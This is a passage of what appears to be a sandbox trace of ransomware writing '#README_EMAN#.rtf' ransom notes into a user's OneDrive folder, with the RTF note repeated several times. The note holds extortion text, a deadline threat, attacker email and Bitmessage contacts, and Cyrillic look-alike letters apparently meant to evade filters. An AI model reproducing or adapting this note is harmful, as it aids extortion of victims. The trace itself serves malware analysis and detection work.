COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nEwJVUzEVMBMGA1UEChMMRGl\x93/", lpUsedDefaultChar=0x0) returned 8717 [0298.806] WriteFile (in: hFile=0x27c, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.807] CloseHandle (hObject=0x27c) returned 1 [0298.807] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hr\\#readme_eman#.rtf")) returned 0xffffffff [0298.807] GetLastError () returned 0x2 [0298.807] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0298.808] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.808] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.808] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 